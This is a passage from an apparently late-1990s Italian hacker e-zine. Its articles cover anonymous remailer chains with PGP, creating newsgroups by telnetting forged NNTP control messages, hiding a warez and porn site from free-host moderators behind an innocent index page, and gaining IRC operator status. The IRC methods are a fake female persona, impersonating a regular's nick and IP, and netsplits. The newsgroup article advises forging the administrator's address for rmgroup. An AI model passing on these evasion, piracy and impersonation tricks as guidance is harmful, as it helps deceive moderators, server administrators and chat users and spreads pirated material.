un hacker potrebbe trovare tutti i vostri dati oppure come successe per anon.penet.fi il
padrone del serve potrebbe essere costretto a dover rivelare il proprio archivio per
consegnare prove algli agenti di stato eccetera, vi consiglio di usare questo tipo di remailer
solo se non avete bisogno di un livello estremamente alto di anonimità, certo che se siete
hacker, reverser o comunque fate cose illegali allora gli Pseudo-Anonymous non sono indicati
infatti mantengono i log, non permettono di concatenare vari remailer tra loro e neanche
accettano mail crittate, l'operatore potrebbe quindi leggersi come e quando vuole la vostra
mail.
CypherPunk
I remailer CypherPunk (detti di Tipo 1) sono estremamente più sicuri dei precedenti per il
semplice fatto che ci offrono svariate chicche che possono farci sempre comodo e queste sono:
1) Accettano la posta crittata
2) Ci consentono di creare un latency time prima del rinvio
3) Abbiamo la possibilità di concatenare più remailer tra loro
4) Utilizzano un riordinamento casuale dei messaggi
Dunque i più esperti sostengono che per ottenere livelli di sicurezza praticamente assoluti
si devono concatenare almeno tre remailer, prima di tutto dobbiamo trovare un remailer e per
questo dovete visitare il sito: http://anon.efga.org/~rlist/rlist.html dovete farlo perchè
i remailer dal momento che non producono entrate vanno e vengono, possono durare anni oppure
restare on-line un solo mese o meno, ok appena avrete il remailer aprite il vostro client di
posta e mettete come indirizzo quello del remailer ad esempio: remailer@flame.alias.net poi
come soggetto quello che volete ed infine potete scrivere la lettera ma con un criterio
standard ossia, prima di mandare il messaggio dovete inserire una riga contenete solo una
coppia di due punti (::) poi lasciare una riga, scrivere una riga con:
Request-Remailing-To: destinatario, di nuovo una riga bianca e poi la lettera, ecco come:
A: remailer@flame.alias.net
Soggetto: quello che più ti garba
----------------------------------------
::
Request-Remailing-To: destinatario@tin.it
Ciao,
questa è una stupida prova per imparare ad usare un remailer
------------------------------------------------------------------------
Ok adesso non vi resta che inviare la mail ed aspettare che arrivi, nonostante tutto il
vostro anonimato non è coperto totalmente quindi non potete minacciare Clinton :), quindi
la lettera arriverà al remailer che a sua volta lo rimanderà a Destinatario@tin.it, ok
adesso per coprire un po' di più il vostro messaggio potete crittarlo col PGP, per prima
cosa dovete ottenere la chiave pubblica del vostro remailer, per farlo mandate una mail
vuota con soggetto: remailer-help al vostro remailer e dopo pochi secondi avrete finalmente
tutte le info sul remailer e la sua chiave pubblica, prendete il messaggio:
::
Request-Remailing-To: Destinatario@tin.it
Ciao,
questa è una stupida prova per imparare ad usare un remailer.
crittatelo usando l'opzione Text Output se avete PGP 6 o superiore:
-----BEGIN PGP MESSAGE-----
Version: PGPfreeware 6.0.2i

hQCMA98tceHEP7bpAQP/aIgwnTmh73X0M1KTMRXLtOeG8qCm1ejQwBTXnJ7NJrS3
qsY4GZTyHmy86U17XRay1nM2GC6eCv81EuZsejQolG4P7kxTX1Ywl2PuPceZPQ3m
JkEbhcNNXIgXqWkc1p/ahb9AnJ08hdi9J+FBcjiI5wUDffaOOSNkOuUoKPhjKTyk
kybbDH8B9GWNd0ruHxQDESWqFDlI2c3naYyxyErH8Kww3NbPjCYcZ07UfxE7LEr9
/gU2hPvOYpj49h6Nm3rRVlS9Kqve9Yr5D6PNxbsP1ege4CMO7uJXG0+r+PdEhZ1R
3CbQOlDANpsmhFVzbxN3bHB/CLFzVg16QrFceYPsO4OZpENAU0Eb3tYv1LRlGn2U
lIhzdQ==
=D7/d
-----END PGP MESSAGE-----
Ok adesso avete crittato con la chiave pubblica del server, adesso però dovete spedire la
mail e come fate? Aprite un nuovo messaggio a fate così:
::
Request-Remailing-To: destinatario@tin.it
::

Encrypted: PGP
-----BEGIN PGP MESSAGE-----
Version: PGPfreeware 6.0.2i

hQCMA98tceHEP7bpAQP/aIgwnTmh73X0M1KTMRXLtOeG8qCm1ejQwBTXnJ7NJrS3
qsY4GZTyHmy86U17XRay1nM2GC6eCv81EuZsejQolG4P7kxTX1Ywl2PuPceZPQ3m
JkEbhcNNXIgXqWkc1p/ahb9AnJ08hdi9J+FBcjiI5wUDffaOOSNkOuUoKPhjKTyk
kybbDH8B9GWNd0ruHxQDESWqFDlI2c3naYyxyErH8Kww3NbPjCYcZ07UfxE7LEr9
/gU2hPvOYpj49h6Nm3rRVlS9Kqve9Yr5D6PNxbsP1ege4CMO7uJXG0+r+PdEhZ1R
3CbQOlDANpsmhFVzbxN3bHB/CLFzVg16QrFceYPsO4OZpENAU0Eb3tYv1LRlGn2U
lIhzdQ==
=D7/d
-----END PGP MESSAGE-----
e la spedite, non dovete fa altro in pratica che aggiungere un'altra volta i due punti e poi
la stringa Encrypted:PGP che serve a dire al remailer che gli state mandando un messaggio
crittato (ovviamente dovete mettere nel campo "A:" l'indirizzo del vostro remailer), vi
starete chiedendo come fa il server a rimandare la lettera se non può leggere il messaggio,
ma è ovvio, siccome abbimao crittato il testo con la sua chiave pubblica lui non fa altro
che decrittare il tutto e leggerlo con comodo :)
Il vostro anonimato a questo punto è già più coperto ma neanche troppo dal momento che il
vostro remailer conosce sia il mittente che il destinatario e quindi un eventuale controllo
potrebbe smascherarvi, per ovviare a questo problema potete concatenare due o più remailer,
farlo è estremamente facile ed ora ve ne mostrerò il modo: si riempiono i consueti campi
"A:" "Subject:" ecc...Poi nel corpo della lettera si inseriscono tanti "Request-Remailing-To:"
quanti sono i remailer che volete usare e poi come all'ultimo "Request-Remailing-To:"
inserite il vostro destinatario, ecco il solito esempio:
A: remailer@flame.alias.net
Soggetto: Prova di concatenazione remailer
-----------------------------------------------------
::
Request-Remailing-To: remailer@base.xs4all.nl
::
Request-Remailing-To: blackbird@cpis.net
::
Request-Remailing-To: bluebox@phreaker.net
::
Request-Remailing-To: cannabis.anon@hotpop.com
::
Request-Remailing-To: destinatario@tin.it
Ciao,
questa è una stupida prova per imparare ad usare una catena di remailer.
A questo punto dovreste aver capito che il primo remailer (remailer@flame.alias.net) prende
la mail le cambia l'header e la rispedisce al secondo che cambia l'header e rinvia il tutto
al terzo e così via fino al destinatario che così saprà solo che la lettera proviene
dall'ultimo remailer, quindi da questo punto di vista l'anonimità è assicurata, è protetta
anche da eventuali supervisori perchè ad ogni modo non potrebbero rintracciarla infatti il
primo remailer conosce il mandante e l'indirizzo del secondo remailer ma non il destinatario
effettivo, il secondo remailer non conosce nè il mittente nè il destinatario effettivo, il
terzo e così via, poi l'ultimo remailer conosce solo il destinatario ma non sa un ciufolo del
mittente quindi non ci sono problemi...Se se, vi credete voi, i problemi ci sono e come
infatti la mail non è crittata quindi qualunque coglione potrebbe leggerla :), ok avrete
capito che adesso parleremo di remailer concatenati e mail crittate...Hehehehehe
GnGnGnGnGnGnGnGn (leggasi come una sghignazzata con la gn di gnomo :).
Adesso proviamo a crittare una mail, prima di tutto vi devo dire il meccanismo: scaricate
la chiave di ogni singolo remailer, scrivete il messaggio comprensivo dei due punti e della
stringa "Encrypted:PGP" e con tutto il testo PGPiatelo con la chiave dell'ULTIMO remailer:
lettera originale:
::
Request-Remailing-To: destinatario@tin.it
Ciao,
questa è una stupida prova per imparare ad usare una catena di remailer.
PGPiatela con la chiave di cannabis.anon@hotpop.com e l'opzione Text Output per versione 6
o superiori del PGP, insomma se c'avete quell'opzione attivatela:
-----BEGIN PGP MESSAGE-----
Version: PGPfreeware 6.0.2i

hQCJAz0VsrLnrsHlAQPopF2nZixPMShNo/+6e4KlYKB0/XO+LiSTXVa2cg8tRU8o
dKkQNWf+yM3EAnnW3q9vyorxN0z1SQEvMHW8V+j81jP9MvXvAhg/uL7r89PIbyk/
lxxSp8s+ATIRJKJDsBv9DJN653pX4pdKuQJ2OpwEt4tlr69+yskSxH2IwdGkil6H
lqDvo+hvAidV61TAeGK9RfiuP0HSQI6MfRl7qbsRyfQ5Hjj9VA0/MX8eKRH65gWv
W03FNzwcSs9byfaeiL5K4AyBS1vzQ/0167uw5xl7eFcHPTDN+q2lCtFL+kxz0keN
+46/aa6q0ZIK3Q6LSIG9NfbDU3t09BcUJfSa7RIvHHI0WdlwVNQs+g==
=acxg
-----END PGP MESSAGE-----
OKi, aggiungete le solite stringhe e rimettete il testo:
::
Request-Remailing-To: bluebox@phreaker.net
::
Encrypted:PGP
-----BEGIN PGP MESSAGE-----
Version: PGPfreeware 6.0.2i

hQCJAz0VsrLnrsHlAQPopF2nZixPMShNo/+6e4KlYKB0/XO+LiSTXVa2cg8tRU8o
dKkQNWf+yM3EAnnW3q9vyorxN0z1SQEvMHW8V+j81jP9MvXvAhg/uL7r89PIbyk/
lxxSp8s+ATIRJKJDsBv9DJN653pX4pdKuQJ2OpwEt4tlr69+yskSxH2IwdGkil6H
lqDvo+hvAidV61TAeGK9RfiuP0HSQI6MfRl7qbsRyfQ5Hjj9VA0/MX8eKRH65gWv
W03FNzwcSs9byfaeiL5K4AyBS1vzQ/0167uw5xl7eFcHPTDN+q2lCtFL+kxz0keN
+46/aa6q0ZIK3Q6LSIG9NfbDU3t09BcUJfSa7RIvHHI0WdlwVNQs+g==
=acxg
-----END PGP MESSAGE-----
A questo punto crittate il tutto con la chiave del remailer precedente e così via fino
alla fine, in pratica dopo questo giro il primo remailer riceverà la lettera comprensiva
della stringa "Encrypted:PGP" lo decritterà con la sua chiave e lo spedirà al secondo
remailer, quest'ultimo lo decritterà con la sua chiave e lo riinvierà al terzo, dopo tutto
il processo destinatario@tin.it riceverà la lettera in chiaro e la potrà vedere, se poi
crittate anche il messaggio con la chiave di destinatario lui riceverà la lettera PGPata,
la decritterà e leggerà il vostro messaggio, a questo punto neanche Dio riuscirà a scoprire
da chi proviene la lettera e state pur certi che nessuno riuscirà neanche a leggerla durante
il percorso, parliamo adesso di alcune opzioncine che possiamo usare per mandare con più
sicurezza una mail. Raga se proprio avete i servizi segreti alle calcagna e neanche 4 remailer
vi riescono a coprire le spalle, oppure sotto casa girano degli agenti con degli strani
apparecchietti con su scritto TEMPEST allora vi hanno fregato e non potete far altro che
fuggire in un paese senza estradizione, ma comunque non vi servirebbe a molto, però se tutto
questo ancora non fosse successo allora potreste proteggere un po' meglio la vostra privacy.
Adesso starete dicendo: "Perchè dopo tutto sto' poema esiste un modo più sicuro per
proteggersi?" Bhè, più sicuro no però possiamo aggiungere qualche chicca alle nostre mail
crittate o meno che siano, se non siete nei guai ma volete evitare il più possibile che il
vostro indirizzo sia rintracciato allora vi potete avvalere di due comodi comandi che i
remailer ci mettono a disposizione, questi sono: i Cutmarks, gli operatori per aggiungere
header supplementari ed il tempo di latenza, vediamo subito come funzioano questi
semplicissimi comandi: dunque i remailer a volte lasciano sul messaggio una firma con su
scritto il loro indirizzo, se volete che nessuno sappia quali remailer sono stati usati
nella catena allora dovete usare il comando "Cutmarks", questo comando vi fa scegliere dei
simboli e dice al remailer di non visualizzare la riga precedente e le seguenti a quei
simboli, vediamo un esempio:
A: bluebox@phreaker.net
Soggetto: Prova Cutmarks
------------------------------------
::
Request-Remailing-To: destinatario@tin.it
Cutmarks: !!
Questa è la prova per capire come funzionano i Cutmarks
Questa riga non sarà presente sul messaggio
!! ;Ecco i Cutmarks
Questa riga non sarà presente sul messaggio
Nè tantomeno ci saranno le prossime
Avete capito come funzionano??? Se per esempio scrivete un messaggio di 30 righe e mettete
i Cutmarks alla 20° riga allora la 19° non verrà visualizzata ma neanche tutte le righe dopo
la 20° ci saranno sul messaggio, ricordatevi solo che tra il request di remailing ed il
comando Cutemarks non devono esserci spazi. Ok questo era facile adesso spieghiamo il
funzionamento del comando ##, questo serve per inserire un header supplementare nella riga
seguente al comando e si usa semplicemente così:
A: bluebox@phreaker.net
Soggetto: Prova Cutmarks
------------------------------------
::
Request-Remailing-To: destinatario@tin.it
## ;Dopo questa riga potete inserire un header supplementare
Questa è la prova per capire come funziona il comando per l'header supplementare.
Adesso parliamo del tempo di latenza, un signore che si chiama Cottrell aveva ipotizzato
un modello di minaccia piuttosto alto verso un determinato target, non vi sto a raccontare
la storia perchè sarebbe troppo lunga, però supponeva in uno dei suoi punti che la maggior
parte dei remailer fosse compromessa da agenzie governative ed altro e diceva che un buon
metodo di difesa era appunto il tempo di latenza del messaggio, il vostro remailer vi mette
a disposizione un comando: "Latent-Time:" che non serve ad altro che conservare per un
determinato periodo il vostro messaggio nel server prima del rinvio, le sintassi a
disposizione sono tre, vediamo come si usano e poi ve ne spiegherò come solito il significato:
A: bluebox@phreaker.net
Soggetto: Prova Cutmarks
------------------------------------
::
Request-Remailing-To: destinatario@tin.it
Latent-Time: 14.28
Questa è la prova per capire come funziona il comando Latent-Time.
----------------------------------------------------------------------------
A: bluebox@phreaker.net
Soggetto: Prova Cutmarks
------------------------------------
::
Request-Remailing-To: destinatario@tin.it
Latent-Time: +8:30
Questa è la prova per capire come funziona il comando Latent-Time.
----------------------------------------------------------------------------
A: bluebox@phreaker.net
Soggetto: Prova Cutmarks
------------------------------------
::
Request-Remailing-To: destinatario@tin.it
Latent-Time: +14:20r
Questa è la prova per capire come funziona il comando Latent-Time.
Nel primo messaggio vediamo che dopo il comando Latent-Time (attenti all'assenza di riga
bianca tra la richiesta di remailing ed il comando di latenza) vediamo la scritta: 14:28,
quello significa che il messaggio deve essere conservato nel server fino alle 14:28 locali,
in pratica verrà rispedito poco prima delle due e mezza del pomeriggio, nel secondo caso
c'è la scritta: +8:30, questo invece significa che il server deve far giacere il messaggio
per 8 ore e 30 minuti mentre nell'ultimo caso vediamo: +14:20r, quella "r" dice al server
che il messaggio deve restare nel server per un tempo CASUALE di massimo 14 ore e 20 minuti,
c'è da notare anche che il tempo viene SEMPRE espresso in Ore e Minuti, viene usata la
modalità 24h ed il ritardo massimo non può superare le 23 ore e 59 minuti. Oki, questa
sezione è finita, parliamo ora dei remailer MixMaster.
MixMaster
I remailer MixMaster (tipo 2) sono considerati l'elite dei remailer, i più sicuri che
esistano e questo perchè utilizzano particolari tecniche, dunque un server MixMaster
critta il messaggio e concatena i remailer in modo automatico, utilizza diversi formati
di crittazione come ad esempio RSAREF ma non PGP, una cosa che li rende molto robusti
dal punto di vista "spionistico" è che divide i messaggi in pacchetti di uguali dimensioni,
in tal modo rende inefficace lo spam-attack ipotizzato da Cottrell, in pratica un eventuale
unità governativa manderebbe al primo server della NOSTRA catena centinaia di messaggi di
diverse dimensioni, dimensioni che sono comunque note e annotate da qualche parte, poi
farebbe un confronto e se trovasse un messaggio di dimensione non nota allora quello sarebbe
il nostro, quindi un attacco di questo genere sarebbe inefficace dal momento che i pacchetti
sono tutti uguali, i pacchetti vengono crittati con un bel TripleDES (anche se a mio parere
potevano usare un algoritmo diverso dal poco sicuro DES come ad esempio IDEA) ad ogni remailer
della catena, il messaggio sarebbe dunque crittato e nessuno potrebbe leggerlo (sono scettico
riguardo al TripleDES perchè è più veloce del DES ma meno sicuro e poi girano voci,
probabilmente vere, che alcuni stati posseggano degli hardware speciali in grado di
decrittare qualunque cosa crittata con questo algoritmo in pochi minuti, in pratica hanno
delle specie di 3Dfx per la crittazione). Altra caratteristica di questi remailer è che
rifiutano di rimandare un pacchetto già inviato, questo provedimento manderebbe a puttane
un reply-attack, in pratica la solita associazion manda migliaia di messaggi insieme al
nostro e poi li fa tornare indietro, se ne sono stati mandati 1000 e ne tornano 999 allora
uno è andato per cazzi suoi ed è probabilmente il nostro, con questo procedimento su un
remailer di tipo CypherPunk si può essere tracciato per intero il percorso del messaggio,
su un server Mix ciò non succede perchè i pacchetti non possono tornare indietro e questo
grazie ad una specie di ID digitale che il server riserva ad ogni pacchetto, poi questo
tipo di server vanifica altri tipi di attacco grazie a quello che i radioamatori chiamerebbero
QRM cioè una specie di rumore di fondo, un po' come quello che sentono i radiotelescopi
quando guardano lo spazio, i MixMaster possono essere concatenati con i CypherPunk ma sia
con questo tipo di utilizzo sia con un tipo di utilizzo MixMaster-MixMaster necessitano di
un software che si appoggia a Private Idaho, adesso vi starete chiedendo: "Cosa cavolo è
Private Idaho?" Hehehe, questo è un meraviglioso programmino che si trova nella sezione
Tools (http://quequero.cjb.net) di questo sito che serve a mandare messaggi crittati
attraverso dei remailer senza fare quel bordello di cui vi parlavo, per usarlo dovete
però avere un altro mini programma che trovate nella stessa sezione che si chiama Mixmaster,
in pratica voi scegliete il remailer da una lista (per aggiornarla basta poi scaricarne una
nuova dal link ad inizio articolo e semplicemente sostiruirla alla vecchia) scrivete il
messaggio e poi ci pensa lui a mandarlo senza pensare ai due punti (::) e alle stringhe,
vi critta il messaggio automaticamente se glielo dite e vi concatena anche i remailer se
volete, in pratica fate quello che io ho impiegato 3 giorni per scrivere in uno o due secondi
al massimo :) non vi ho accennato prima a questo programma perchè comunque dovete avere le
basi per sapere ciò che state facendo. È finita???? Magariiiiiii, la regia mi impone di
parlare del Reply-Block, oki, dai con ques'ultimo sforzo. Allora raga come abbiamo visto
con questi cavolo di remailer c'èra un problema cioè: il rinvio della posta, insomma è
inutile che mandavamo una lettera al nostro spacciatore di fiducia facendola passare sotto
quindicimila remailer MixMaster se poi lui la rimandava a destinatario@tin.it, insomma,
che kazzo stiamo a fa? L'arte dei pazzi!!! E no, allora l'unica soluzione possibile era:
1) Farci rimandare la mail da una casella anonima (Freemail, Yahoo ecc...) ma a questo
punto la posta la potevamo mandare e rimandare da li
2) Mandare le lettere attraverso i soliti quindicimila remailer e poi farla tornare
attraverso 12 mail-forward, ma in ogni caso i mail-forward non so' per niente anonimi
3) Farsi un reply block...Mmmm ma che è sto reply block?
Bhè non è niente più che il nostro indirizzo di posta crittato con la chiave del remailer,
mi spiego meglio: chi l'ha detto che dobbiamo crittare un messaggio per non farlo leggere
ai curiosi e che non lo possiamo invece crittare per non farlo leggere al destinatario???
Nessuno allora fate una mini lettera di questo genere:
---------------------
::
Request-Remailing-To: Mittente@tin.it
----------------------------


Quequero







+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-






COME CREARE UN NEWSGROUP: by BoBo




Salve a tutti, è la prima volta che scrivo in una e-zines e sono molto felice di farlo
insieme a Zio Marzo, cmq dato che all'e-mail di attila_hack sono arrivate tante richieste
su come creare un newsgroup, ho deciso di spiegarlo per (speriamo) :) l'ultima volta.

1-Ci si collega alla porta 119 con telnet e si inseriscono questi comandi:

post
From: attila_hack@hotmail.com
Subject: cmsg newgroup alt.hackers.attila_hack
Control: newgroup alt.hackers.attila_hack
Newsgroups: alt.hackers.cough.cough.cough // Newsgroups: va scritto in questo
// campo il nome di un ng qualsiasi
// basta che sia presente sul server news
// dove vuoi creare il nuovo Newsgroup,
// tanto poi l'articolo stesso non viene
// pubblicato.
Approved: attila_hk@hotmail.com // Credo che per essere moderatori basti
// solamente aggiungere la linea Moderator
// accanto a questo indirizzo

  
e-mail.
//qui ci vanno due righe bianche alt.hackers.attila_hack In questo newsgroups si discute di Hacking - Cracking e Phreacking Attila_Hack Site Official: http:\\attila_hack.cjb.net Attila_Hack e-mail: attila_hack@hotmail.com
//Infine, quest'ultimo spazio è dedicato al manifesto
// del nuovo NG
.
//Il punto serve a terminare il POST



N.B.1 Per Controllare l'avvenuta richiesta di creare un Newsgroup andare al newsgroup:
control-newgroup per altri dettagli newzbot (DB dove puoi ricercare ad esempio
tutti i news servers su i quali appare un determinato newsgroup e anche altre
cose...) : http://www.jammed.com/~newzbot/

N.B.2 Se vuoi fare il moderatore del tuo ng invece devi aggiungere la linea Moderator
(penso nella riga approved) con la sintassi che segue come da RFC relativo.

N.B.3 E' meglio se l'indirizzo sotto approved e' diverso da quello del from, infatti,
è molto probabile che un robot verificatore controlli almeno l'esistenza degli
indirizzi mail e dei moderatori citati negli approved.

N.B.4 Il tempo che passa prima di vedere il nuovo Newsgroup messo on-line, dipende da
tantissime cose e varia da un mese ad un giorno cmq affidandosi alla Tin, piuttosto
che ad interbusiness ed a Tiscali dovrebbe accellerare la cosa.
N.B.5 Per rimuovere un newsgroup (per esempio alt.lamer) bisogna invece utilizzare:
rmgroup alt.nomegruppo (come sempre, utilizzando Subject, Control, Approved ecc..).
Questo comando, pero`, non viene gestito quasi mai in maniera automatica, ma passa
per le mani dell'Amministratore, che puo` decidere di non permetterne l'esecuzione.
Nel caso di newgroup e (soprattutto) rmgroup e` molto utile utilizzare come From e
Approved l'indirizzo email dell'Amministratore. :-DDeeehhheiiiiieuuhheiiiuu


ECCO QUI IL TUTTO SENZA COMMENTO (basta fare copia e incolla e cambiare le info
essenziali:from... control.. subject... ecc..) RICORDATI DI COLLEGARTI ALLA PORTA DEL
SERVER NEWS per inviare questi dati(AD ESEMPIO: news.tin.it), porta 119:

post
From: attila_hack@hotmail.com
Subject: cmsg newgroup alt.hackers.attila_hack
Control: newgroup alt.hackers.attila_hack
Newsgroups: alt.hackers.cough.cough.cough
Approved: attila_hk@hotmail.com


alt.hackers.attila_hack In questo newsgroups si discute di Hacking - Cracking e
Phreaking Attila_Hack Site Official: http:\\attila_hack.cjb.net Attila_Hack
e-mail: attila_hack@hotmail.com
.

-----------------Fine (spero di essere stato abbastanza esauriente :-))--------------------





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



COME MANTENERE UN SITO WAREZ: By LiQUID


'ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ"+- +- +- +- +- +- +- +- +-
'º come mantenere siti warez º-=-=-=-=-=-=-=-=-=-=-=-=-=-
'ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ"
°º Powered by [LiQUID] º
Indice: ²ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ1/4
00 Indice ;) °º\ / /$#@ ]
01 Disclaimer ²º \++++++++++/-------/ $#@ ]
02 Cosa vi serve °º \ / / $#@ ]
03 Teoria ²º \ /\ / $#@ ]
04 Come procedere °º \ / \ / $#@ ]
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ²º \ / \ / $#@ ]
³ liquido@freemil.it ÃÄÄÄÄÄ1/4+-+-+-\/+-+-+-\/+-+-+-+#@ ]
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Disclaimer
Prima di iniziare vorrei dire che l'autore (io) non puo' essere coinvolto
o ritenuto colpevole se succedesse qualcosa di ....strano ;) Inoltre non
promette nulla riguardo il corretto funzionamento di questa semplice tecnica.
Se pensate di essere coinvolti in qualsiasi maniera in brutte faccende
leggendo il testo qui di seguito, fermatevi immediatamente e cancellate
questo sporco pugno di bit dal vostro piccci! ;-P
Se per caso voi veniste coinvolti lo spirito di affrontare questa spiacevole
situazione e': 'Io non c'ero, non sono mai esistito, non ne ho la piu' pallida
idea di come quello sporco pugno di bit sia finito nel mio picci'!'

Questo Š un facile scherzetto che tutti che hanno almeno un minimo
di conoscenza in intenet riesce a fare :)

Cosa vi serve
- innanzitutto un sito (quello che dovete mettere e mantnere illegalmente);
- poi vi serve una mail anonima (come hotmail, freemail, ecc.);
- un secondo sito, pagina non troppo personale, e SENZA NULLA DI ILLEGALE

Teoria
Esistono certi servizi, meravigliosi, dove si da uno spazio web a disposizione
dei navigatori. Questi sono Xoom, Tripod, Geocities, Freeweb, ed altri ancora.
E' risaputo che questi sono moderati, cioŠ non ci si possono pizzare nŠ
immaginiporno, nŠ war-software, peccato :(((((
Ma noi con il nostro risaputo spirito anarchico non ci faremo di certo mettere
sotto da un cos piccolo problemuccio ;)
NON VOGLIAMO RINUNCIARE AL NOSTRO SITO WAREZ!!!!!!!!!!!!!!!!!!!!!!!!
Ecco come funziona la tecnica di controllo che i webmaster dei siti sopra
indicati usano per 'moderarci':
Esraggono a random (a caso) una pagina, e ne vanno a vedere l'indice,
MA SOLO QUELLO E LE PAGINE AD ESSO COLLEGATE!!!!

Come procedere
Noi ci faremo i nostri due set di pagine:
La prima warez e xxx, e la seconda innocente come un angioletto, con i nostri
hobby, qualche cazzatina varia, e qualche link, nulla di speciale. La
rinonimeremo come index.html (l'indice appunto). Poi uploderemo anche il
nostro sito warez, ma NESSUNA pagina collegher... questo col primo!
Poi prenderemo un remailer, come tsx, fly, ecc. e gli diremo di collegarsi
alla pagina warez (per esempio io potrei mettere index.html, ed liquid.html,
il remailer dovr... collegarsi a liquid.html ;)

Ora vi vorrei dire un piccolo trucchetto (datomi da Kalidor):
Se noterete tutti i servizi che danno spazio gratis hanno uno striscione
aggintivo per fare pubblicit... (la xoom la sriscia in alto, la tripod e
geocities, una banda aggintiva.
Vi rivelero......come far scomparire la banda della xoom ;):
(Taglia e incolla dal sito di Kalidor ;)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Per togliere il banner di xoom in alto dovete:

Se avete TSX reindirizzate la pagina invece che a members.xoom.it/user/pag.htm
mettete members.xoom.it/_XOOM/user/pag.htm non dimenticate il file .htm
perche' se mettete solo members.xoom.it/_XOOM/user/ il banner verrà messo lo
stesso.

Se usate soltanto la pagina xoom senza tsx create un .html iniziale che
rimanda automaticamente all'url members.xoom.it/_XOOM/user/pag.htm in modo da
non far vedere o almeno da far scomparire subito il banner.
Il codice per il redir automatico e':

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<meta http-equiv="Refresh"

content="0;URL=http://members.xoom.it/_XOOM/user/pag.htm">

<meta name="GENERATOR" content="Kalidor">

<title>TITOLO</title>

</head>

<body text="#FFFFFF" bgcolor="#000000">

</body>

</html>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Ok Ragazzi, ora sapete come mantener il proprio sito illegale, e
vi auguro di riuscirvi bene!!! L'ultima cosa: se riuscite a fare siti davvero
BELLI (con belli intendo dire con anche qualche ritocchino con belle immagini
inedit [slurp!] mandatemi una mail!


by [LiQUID]
liquido@freemail.it






+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-





DUE METODI PER DIVENTARE OP CON UN PO DI CULO!!!: by ZioButtha




Hihihihi... premetto che non volevo scrivere niente su irc, ma BoBo ha così
insistito.. che mi ha QUASI obbligato dicendomi: .....è meglio che l'articolo
lo scrivi tu perchè io non ci capisco un ca**o e non so a chi farlo fare!!!

L'articolo si prospetta interessante dal titolo... vero? Quindi sarete ansiosi
di cominciare?

Bene...bene!

Consumo: Un pacco di Plumcake farciti allo yogurt, una bottiglia di lambrusco..
no no ehehe al posto del vinello mettete l'acqua guizza che è meglio,
mica mi voglio ubriacare subito no?

Ora: 18:19 pm, ehhehe sto rubando tempo alla software house in cui lavoro per
scrivere questo articolo, spero che alla fine ne sia valsa la pena ;-)

Tempo Impiegato: 4 orette, eh si me la sto prendendo comoda, tanto oggi 27/8/99
non c'è nessuno in ufficio:)

Saluti Speciali: BoBo per la simpatia ;), il mio sysadmin preferito Reserved Reserved,
LaNdo che senza di te non sapevo un cavolo di programmazione:), tutti
gli Attila_Hack MemberZ (siamo una Crew veramente tosta:)), il
Wannabe_1999 Staff, mio fratello Reset (che riesce da solo ad
amministrare il server di una Lan con più di 1000 utenti DA REMOTO)
e infine vorrei salutare Torpedo Blu che adesso non puo essere qui perchè
si trova a Santa Cruz per affari *nix-iani;).

Musica Ascoltata: A Kind of Magic, Under Pressure, Radio Ga Ga, I Want It All,
I Want to break Free, Innuendo, The invisible Man.......
.......Tutte canzoni dei mitici Queen.



Cominciamo su....


I metodi che mi appresto a descrivere sono tre: il primo tocca l'arte del social engeenering
e consiste nel'entrare nel canale irc con un nick da donna ad esempio: silvia99 o laura77,
il trucco consiste appunto nel mettersi a parlare con uno degli operatori e farsi credere
disponibili per diventare amici... o altro... in una media di due op su tre ci cascano e vi
oppano dopo che ci avete parlato una mezzoretta (l'uomo è o non è un animale debole?).
Bhe, questo è il metodo più utilizzato per i thakeover, ma a noi per adesso non interessa,
prossimamente penso di scrivere un articolo dal titolo: "Thakeoveriamo in 4 semplici mosse"
nel quale vi spiegherò come si fanno i thakeover, cosa sono e quali sono i più utilizzati
nell'irc-war.

Il secondo metodo (il più bastardo:) è quello di studiare il canale e vedere chi sono i
"clienti" abituali che vengono oppati, prenderne in considerazione uno e cercare di copiare
il più possibile il suo indirizzo ip, poi si torna il giorno dopo con il suo nick e si fa
finta di essere lui e quindi qualcuno (fesso) ti oppa. HEhehehehe, questo metodo l'ho provato
una sera su #hackernow, ho copiato l'ip di nbody88 e mi hanno oppato subito hehehe
ci sono cascati come salami, però non ho takkato perchè quel chan mi è simpatico,
ma mi sono cambiato il nick in gerry e sono stato deoppato subito (l'ho fatto per
vedere se ci arrivavano che non ero nobody:). Ragazzi.. se ci sono cascati quelli di
#hackernow pensate negli altri chan che potete fare:)))).

Bene..bene, il terzo metodo, che è molto più bello dal punto di vista etico... consiste
nell'aspettare che un server splitti... ci sono dei particolari canali

Oops... mi si è cancellata la lista dei chan....no non vi proccupate sto scherzando ;), uno
dei chan che conosco io si chiama: &servers.

Questi chan ci informano quando un server splitta:c ioè il server dove stà il bot e il
canale irc sono disincronizzati, quindi, il bot non è più nel canale e in questo caso
basta entrare nel canale splittato; qua il server irc vedendo solo noi ci oppa...Ehehehe:).

Spero di avervi allietato... vabbè e ci ho impiegato pure quattro ore per scrivere queste due
cose;-)

Saluti a tutti ZioButtha Attila_Hack MemberZ

(¯`·.¸¸.·´¯`·.¸¸.-> Attila_Hack crew <-.¸¸.·´¯`·.¸¸.·´¯)
